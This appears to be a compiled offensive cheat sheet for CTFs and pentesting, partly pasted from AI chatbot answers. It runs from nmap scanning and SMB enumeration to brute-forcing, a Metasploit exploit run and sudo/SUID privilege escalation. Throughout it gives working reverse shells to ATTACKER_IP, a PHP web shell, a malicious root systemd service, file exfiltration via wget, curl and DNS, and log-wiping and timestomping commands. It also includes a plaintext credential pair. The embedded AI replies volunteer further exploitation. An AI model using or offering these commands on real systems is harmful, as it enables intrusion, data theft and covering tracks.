nmap -A -sC -sV -oN nmap.txt IP
- Full Network Recon (Aggressive Scan with OS & Version Detection):
nmap -A -T4 192.168.1.1
- Quick Scan of Most Common Ports:
nmap -F 192.168.1.1
- Full Port Scan + Service Detection:
nmap -p- -sV 192.168.1.1
- Detect Live Hosts in a Network:
nmap -sn 192.168.1.0/24
- Scan for Vulnerabilities (NSE Scripts):
nmap --script vuln 192.168.1.1
- Bypass Firewall & Stealth Scan:
nmap -sS -T3 -D RND:10 192.168.1.1
- Scan a single target:
nmap 192.168.1.1 - Scan multiple targets:
nmap 192.168.1.1 192.168.1.2 - Scan an entire subnet:
nmap 192.168.1.0/24 - Scan from a file list:
nmap -iL targets.txt - No ping scan (for firewalled hosts):
nmap -Pn 192.168.1.1
- Scan all 65,535 ports:
nmap -p- 192.168.1.1 - Scan specific ports:
nmap -p 22,80,443 192.168.1.1 - Scan a port range:
nmap -p 1-1000 192.168.1.1 - Scan top 1000 most common ports:
nmap --top-ports 1000 192.168.1.1
- TCP SYN scan (stealthy, default for root):
nmap -sS 192.168.1.1 - TCP Connect scan (for non-root users):
nmap -sT 192.168.1.1 - UDP scan:
nmap -sU 192.168.1.1 - Aggressive scan (OS, versions, scripts, traceroute):
nmap -A 192.168.1.1 - Scan with OS detection:
nmap -O 192.168.1.1
- Detect running services & versions:
nmap -sV 192.168.1.1 - Aggressive version detection:
nmap -sV --version-intensity 5 192.168.1.1
- Change scan timing (1-5, slow to fast):
nmap -T4 192.168.1.1 - Use decoys to hide real IP:
nmap -D RND:10 192.168.1.1 - Spoof source IP:
nmap -S 192.168.1.100 192.168.1.1 - Fragment packets to bypass filters:
nmap -f 192.168.1.1 - Use a custom MAC address:
nmap --spoof-mac 00:11:22:33:44:55 192.168.1.1
- List available scripts:
nmap --script-help=default - Scan for vulnerabilities:
nmap --script vuln 192.168.1.1 - Scan for common exploits:
nmap --script exploit 192.168.1.1 - Scan for web vulnerabilities:
nmap --script=http-vuln* 192.168.1.1 - Detect open directories:
nmap --script http-enum 192.168.1.1
- Save results in normal text format:
nmap -oN scan.txt 192.168.1.1 - Save results in XML format:
nmap -oX scan.xml 192.168.1.1 - Save results in all formats:
nmap -oA scan_results 192.168.1.1 - View output in grep-friendly format:
nmap -oG scan.gnmap 192.168.1.1
- Scan for live hosts only:
nmap -sn 192.168.1.0/24 - Detect SMB vulnerabilities:
nmap --script smb-vuln* -p 445 192.168.1.1 - Enumerate SNMP information:
nmap -sU -p 161 --script=snmp-info 192.168.1.1 - Brute-force FTP login:
nmap --script=ftp-brute -p 21 192.168.1.1
- Well-Known Ports (0-1023): Reserved for system processes and well-known services.
- Registered Ports (1024-49151): Assigned by IANA for user applications.
- Dynamic/Private Ports (49152-65535): Used for temporary or custom connections.
| Port | Service | Description | Common Vulnerabilities |
|---|---|---|---|
| 21 | FTP | File Transfer Protocol | Anonymous login, brute-force attacks, clear-text transmission |
| 22 | SSH | Secure Shell | Weak credentials, outdated versions, brute-force |
| 23 | Telnet | Unencrypted Remote Login | Clear-text transmission, credential theft |
| 25 | SMTP | Simple Mail Transfer Protocol | Open relays, spam abuse |
| 53 | DNS | Domain Name System | DNS spoofing, cache poisoning, amplification attacks |
| 80 | HTTP | Web Traffic | XSS, SQL Injection, Directory Traversal |
| 110 | POP3 | Email Retrieval | Clear-text credentials, brute-force |
| 135 | RPC | Remote Procedure Call | DCOM/RPC exploits, lateral movement |
| 139 | NetBIOS | Windows File Sharing | SMB relay attacks, enumeration |
| 143 | IMAP | Internet Message Access Protocol | Brute-force, credential leaks |
| 443 | HTTPS | Secure Web Traffic | SSL vulnerabilities (Heartbleed, TLS downgrade) |
| 445 | SMB | Windows File Sharing | EternalBlue, SMBGhost, WannaCry |
| 3306 | MySQL | Database | SQL injection, weak credentials |
| 3389 | RDP | Remote Desktop Protocol | Brute-force, BlueKeep exploit |
- SQL Injection
- Cross-Site Scripting (XSS)
- Directory Traversal
- Remote Code Execution (RCE)
- Anonymous authentication
- SMB relay attack
- Ransomware infection via SMB vulnerabilities
- Open relay abuse
- Phishing & spoofing attacks
- Credential brute-forcing
- Weak authentication
- Brute-force attacks
- Man-in-the-middle (MITM) attacks
- Basic command:
gobuster dir -u http://10.10.195.158 -w /home/iftx/Desktop/Hacking/Recon/wordlist/common.txt
- Basic command:
ffuf -u http://10.10.195.158/FUZZ -w /home/iftx/Desktop/Hacking/Recon/wordlist/common.txt ffuf -u https://example.com/FUZZ -w /path/to/wordlist.txt -t 5 -p 0.5 -e .php,.html,.txt -fc 403,404
- Basic command:
dirb http://10.10.195.158 /home/iftx/Desktop/Hacking/Recon/wordlist/common.txt
- Basic command:
nikto -h http://10.10.195.158
- Basic command:
wfuzz -c -z file,/home/iftx/Desktop/Hacking/Recon/wordlist/common.txt -u http://10.10.195.158/FUZZ
- Command:
nmap --script http-enum -p 80 10.10.195.158
nmap --script smb-enum-shares,smb-enum-users -p 139,445 <target-IP>- Enumerates SMB users & shares.
nmap --script smb-vuln* -p 139,445 <target-IP>- Checks SMB vulnerabilities.
smbclient -L //<target-IP> -U ""- Lists available shares without authentication.
smbclient //<target-IP>/share -U user- Connects to a specific share.
smbmap -H <target-IP>- Checks read/write access.
smbmap -H <target-IP> -R- Recursively lists all files.
cme smb <target-IP> --shares- Lists shared folders.
cme smb <target-IP> -u user -p password --shares- Enumerates shares with credentials.
enum4linux -a <target-IP>- Performs all enumeration techniques.
enum4linux -U <target-IP> # List users
enum4linux -S <target-IP> # List shared folders rpcclient -U "" <target-IP>- Connects to SMB RPC services without authentication.
rpcclient -U user <target-IP>
> enumdomusers- Enumerates domain users.
1️⃣ Check open SMB ports → nmap -p 139,445 <IP>
2️⃣ Enumerate shares & users → nmap --script smb-enum-shares,smb-enum-users -p 139,445 <IP>
3️⃣ Try accessing shares → smbclient -L //<IP> -U ""
4️⃣ Check permissions → smbmap -H <IP>
5️⃣ Look for vulnerabilities → nmap --script smb-vuln* -p 139,445 <IP>
🚀 Use these tools responsibly for pentesting & bug bounty engagements!
Brute-Forcing SquirrelMail Login
Hydra Command:
hydra -l milesdyson -P log1.txt 10.10.195.158 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=SquirrelMail - Unknown user or password incorrect" -V -FMedusa Command:
medusa -h 10.10.195.158 -u milesdyson -P log1.txt -M http -m POST:/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1Both tools brute-force the login for SquirrelMail using a username (milesdyson) and a password list (log1.txt) to find the correct credentials.
hydra -l user_ name -P /home/iftx/Desktop/Room/wordlist/rockyou.txt 10.10.181.27 ssh
Metasploit Exploitation (Ghostcat - CVE-2020-1938)
- Launch Metasploit
msfconsole
-
Search for AJP Exploits
msf6 > search ajp
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/tomcat_jsp_upload_bypass 2020-02-24 excellent Yes Tomcat RCE via JSP Upload Bypass
-
Select and Configure the Exploit
msf6 > use 0
msf6 exploit(multi/http/tomcat_jsp_upload_bypass) > show options
Module options (exploit/multi/http/tomcat_jsp_upload_bypass):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s)
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path
VHOST no HTTP server virtual host
msf6 exploit(multi/http/tomcat_jsp_upload_bypass) > set RHOSTS 10.10.228.82
msf6 exploit(multi/http/tomcat_jsp_upload_bypass) > set RPORT 8009
msf6 exploit(multi/http/tomcat_jsp_upload_bypass) > run
skyfuck:8730281lkjlkjdqlksalks
find / -type f -perm -4000 -ls 2>/dev/nullFor python -> 266770 3580 -rwsr-sr-x 1 root root 3665768 Aug 4 2020 /usr/bin/python
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
Ran sudo -l and found:
User gwendoline may run: (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt→ Vi can be executed as any user except root (!root) without a password.
sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt- Why it works:
-u#-1triggers an integer underflow, resolving to UID 0 (root) despite!rootrestriction.
Inside Vi:
:!/bin/bash→ Spawns a root shell (GTFOBins technique).
| Vulnerability | Impact | Tool Reference |
|---|---|---|
| CVE-2019-14287 | Bypasses !root restriction via -u#-1 trick |
Sudo Security Advisory |
| Vi Shell Escape | Arbitrary command execution as root | GTFOBins: vi |
| NOPASSWD Misconfiguration | No password required for escalation |
- Update Sudo: Patch to version 1.8.28+ to fix CVE-2019-14287.
- Restrict Sudoers:
# Replace: (ALL, !root) NOPASSWD: /usr/bin/vi # With: (gwendoline) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
- Audit: Regularly run
sudo -lfor all users.
- Proof of Concept:
whoami # Output: root cat /root/root.txt
- Ran
sudo -land found:→User jessie may run: (root) NOPASSWD: /usr/bin/wget
wgetcan be executed as root without a password.
- Method 1: Directly read
/root/root_flag.txt:sudo wget -i /root/root_flag.txt # Uses `-i` to read the file - Method 2: Exfiltrate the file via HTTP (if
-ifails):→ Check HTTP server logs for the flag.sudo wget --post-file=/root/root_flag.txt http://ATTACKER_IP:8000
- GTFOBins:
wgetwithsudocan read arbitrary files (-ior--post-file). - No Password:
NOPASSWDallows privilege escalation without authentication.
- Restrict
sudo: AvoidNOPASSWDfor commands likewget. - Audit: Regularly check
sudo -lfor all users.
Impact: Critical (root access via file read/write).
Tool Reference: GTFOBins: wget.
Next Steps:
- Try writing files (e.g.,
/etc/sudoers) for a full root shell. - Use
sudo wgetto fetch and execute a reverse shell script.
Need a deeper exploit? Let me know! 🔥
- Find setuid binaries owned by root:
find / -user root -perm -4000 -print 2>/dev/null
If /bin/systemctl has setuid, it can be abused.
- Create a malicious service (root.service):
ini
Copy
[Unit]
Description=root
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'
[Install]
WantedBy=multi-user.target
- Host the service & transfer to target: Start HTTP server:
python -m http.server 80
On target, download:
wget http://ATTACKER_IP/root.service -O /tmp/root.service
- Enable & start the service:
systemctl enable /tmp/root.service # Uses setuid to gain root
systemctl start root
- Get root shell: Attacker listens:
nc -lvnp PORT
Service executes reverse shell as root.
Remove setuid from systemctl:
chmod u-s /bin/systemctl Restrict service file creation in /tmp (use noexec)
Monitor for unusual service activations
If cat is disabled but you have bash or sh, you can read all files recursively:
find / -type f -name "*.txt" -exec sh -c 'echo "File: {}"; while IFS= read -r line; do echo "$line"; done < {}' \; 2>/dev/nullfind / -type f -name user.txt -ls 2>/dev/nullThis will list and print all .txt files on the system.
Modify -name "*.txt" to target other extensions (e.g., *.php, *.bak).
(CTF | Bug Bounty | Pentest | Red Team)
# Find flags by name/extension
find / -type f \( -name "*flag*" -o -name "*.txt" -o -name "*.conf" \) 2>/dev/null
# Find recently modified files (last 24h)
find / -type f -mtime -1 2>/dev/null
# Find hidden files
find / -name ".*" -ls 2>/dev/null # Search for common patterns
grep -rniE "password|api[_-]?key|jwt|secret|flag{" /etc /home /var/www 2>/dev/null
# Database credentials
grep -rni "mysql://\|postgresql://" / 2>/dev/null | Path | Purpose |
|---|---|
/home/*/.ssh/ |
SSH private keys |
/var/www/html/ |
Web app configs (Bug Bounty) |
/etc/shadow |
Password hashes (Pentest) |
/opt/backups/ |
Database/config backups |
# Basic alternatives
less /path/file # Interactive
tail -n 50 /path/file # Last 50 lines
# Scripting
python3 -c "print(open('/etc/passwd').read())"
perl -pe 'print' /path/file
# Binary/encoded
strings /path/file # Extract text
base64 /path/file | base64 -d # Encode→Decode /bin/?at /path/file # Tries /bin/cat, /bin/bat # DNS (Attacker: `sudo tcpdump -i eth0 udp port 53`)
xxd -p /path/file | while read line; do dig "$line.domain.com"; done
# HTTP (Quick)
curl -X POST --data-binary @/path/file http://attacker.com # Sudo abuse
sudo -l # Check ALL/NOPASSWD
# SUID/SGID binaries
find / -perm -4000 -o -perm -2000 2>/dev/null
# Writable cron jobs
ls -la /etc/cron* /var/spool/cron uname -a # Check version
searchsploit linux kernel 5.4.0 # Find exploits # LinPEAS (Full audit)
curl -L https://linpeas.sh | sh
# LinEnum (Quick enum)
./LinEnum.sh -t # Base64
echo "RkxBR3tleGFtcGxlfQ==" | base64 -d
# Hex
echo "464C4147" | xxd -r -p
# ROT13
echo "SYNT" | tr 'A-Za-z' 'N-ZA-Mn-za-m' # Spawn TTY shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Reverse shell
bash -c 'bash -i >& /dev/tcp/10.0.0.1/443 0>&1' # Clear logs
shred -u /var/log/auth.log
# Timestomp
touch -r /etc/passwd /root/.bash_history - CTFs: Check
/tmp/,/opt/, and home directories. - Bug Bounty: Hunt for
.env,config.php.bak. - Pentest: Always check
sudo -land SUID binaries first.
1. Find flags: `find / -name "*flag*" 2>/dev/null`
2. Read files: `less /path/file` or `python3 -c "print(open('f').read())"`
3. PrivEsc: `sudo -l`, `find / -perm -4000`
4. Decode: `echo "BASE64" | base64 -d`
5. Shell: `python3 -c 'import pty; pty.spawn("/bin/bash")'` An RSA private key is a cryptographic key used for secure authentication, typically in SSH, SSL/TLS, and encrypted communications. If exposed, it can lead to unauthorized system access, making it a critical finding in security assessments.
- Format: PEM (Base64-encoded, with
-----BEGIN RSA PRIVATE KEY-----header). - Usage: SSH logins, decrypting data, or signing certificates.
- Common Locations:
- Web server leaks (
/id_rsa,/backup/id_rsa.bak). - Git repository exposures (
.git/config,~/.ssh/). - Misconfigured cloud storage (AWS S3, GCP buckets).
- Web server leaks (
- Check if the key is valid:
openssl rsa -in id_rsa -check
- If passphrase-protected, crack it using:
ssh2john id_rsa > id_rsa.hash john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
- Restrict permissions (SSH requires strict file modes):
chmod 600 id_rsa
- Attempt SSH login:
ssh -i id_rsa user@target_ip
- Common Usernames (if unknown):
for user in $(cat users.txt); do ssh -i id_rsa $user@target_ip -o ConnectTimeout=2; done
- Check
sudo -lfor misconfigurations (as in yourwgetcase). - Look for writable cron jobs, SUID binaries, or kernel exploits.
- GitHub/GitLab Repos: Search for
-----BEGIN RSA PRIVATE KEY-----. - Exposed Backups:
/backup,/www/backup,.bakfiles. - Logs & Environment Variables: Check
/proc/self/environ, error logs.
- Critical Severity: Unauthorized server access → data breaches.
- Report Template:
Title: Exposed RSA Private Key Leading to Server Compromise Description: A private SSH key was found at [URL], allowing unauthorized access to [service]. Proof: [Attach key + successful SSH login screenshot] Remediation: Revoke the key, enforce key rotation, disable passwordless auth.
- Hidden Key in Web Source
- Use
curlorview-source:to find keys in HTML comments.
- Use
- Steganography in Images
- Extract keys using
steghide,binwalk, orstrings.
- Extract keys using
- Abusing Weak Permissions
- If you get a low-priv shell, check
/home/*/.ssh/for keys.
- If you get a low-priv shell, check
- TruffleHog: Scans Git repos for secrets.
- GitLeaks: Detects exposed keys in version control.
- ssh-audit: Checks SSH server vulnerabilities.
- Never store keys in web directories.
- Use SSH certificates instead of raw keys.
- Rotate keys periodically and revoke compromised ones.
# /etc/ssh/sshd_config
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys- Penetration Testing: Only test authorized systems.
- Bug Bounty: Follow the program’s rules (don’t exfiltrate data).
- CTFs: Keys are intentionally placed—don’t attack real systems.
- Pentest: Use exposed keys for initial access → escalate privileges.
- Bug Bounty: Report exposed keys immediately (critical finding).
- CTF: Often a shortcut to flags—check backups, source code, and logs.
# Test key validity
openssl rsa -in id_rsa -check
# Crack passphrase-protected key
ssh2john id_rsa > hash && john --wordlist=rockyou.txt hash
# SSH login attempt
chmod 600 id_rsa && ssh -i id_rsa user@target(Pentest/Bug Bounty/CTF Field Manual)
php -r '$sock=fsockopen("ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'Why Use This?
- Minimal footprint, works on most PHP-enabled systems
- Bypasses restrictive environments where full shells are blocked
php -r '$sock=fsockopen("10.0.0.1",4444);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'Advantages:
- More reliable for complex interactions
- Better handling of I/O streams
<?php system($_GET['cmd']); ?>Deployment:
- Upload to vulnerable web directory (e.g.,
/uploads/shell.php) - Execute commands via:
http://target.com/uploads/shell.php?cmd=whoami
nc -nvlp 4444Pro Tip: Use -v for verbose mode to confirm connections.
# In Metasploit:
msf6 > use multi/handler
msf6 > set payload php/reverse_php
msf6 > set LHOST YOUR_IP
msf6 > set LPORT 4444
msf6 > exploitBenefits:
- Auto-handles session restoration if disconnected
- Built-in logging
python3 -c 'import pty; pty.spawn("/bin/bash")'Follow-up:
CTRL+Z # Background the shell
stty raw -echo; fg # Enable raw mode
export TERM=xterm # Enable full terminal features| Command | Use Case |
|---|---|
script -qc /bin/bash /dev/null |
Systems with script binary |
socat exec:'bash -li' pty,stderr,setsid,sigint,sane |
Requires socat installation |
perl -e 'exec "/bin/bash";' |
Perl-based systems |
- Spawn TTY
- Set terminal type:
export TERM=xterm-256color - Fix stty:
stty rows 55 columns 238 # Adjust to your terminal size
# Disable history in current session
unset HISTFILE# Overwrite PHP error logs after exploit
echo "" > /var/log/apache2/error.log# Encrypted reverse shell (OpenSSL)
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect ATTACKER_IP:4444 > /tmp/s; rm /tmp/s| Issue | Solution |
|---|---|
| Shell dies immediately | Use while true; do nc -lvp 4444; done on listener |
| No Python/socat | Try awk 'BEGIN {system("/bin/bash")}' |
| Firewall blocking | Use common ports (80, 443) or ICMP/DNS tunneling |
- Use in blind RCE scenarios (e.g., Log4j exploits)
- Combine with SSRF to pivot internally
- Bypass restricted shells via PHP wrappers:
php -r "include('data://text/plain,<?php system(\$_GET[\"cmd\"]) ?>');"
- Chain with credential theft:
php -r 'echo file_get_contents("/etc/passwd");'
1. Start Listener: `nc -nvlp 4444`
2. PHP Shell: `php -r '$s=fsockopen("IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'`
3. Stabilize: `python3 -c 'import pty; pty.spawn("/bin/bash")'`
4. Full Upgrade: `export TERM=xterm; stty raw -echo; fg`Pro Tip: Bookmark this guide and save the cheatsheet as shells.txt in your toolkit. For a PDF version with clickable TOC, reply "PDF please"!
Need Windows reverse shell equivalents? Let me know. 🚀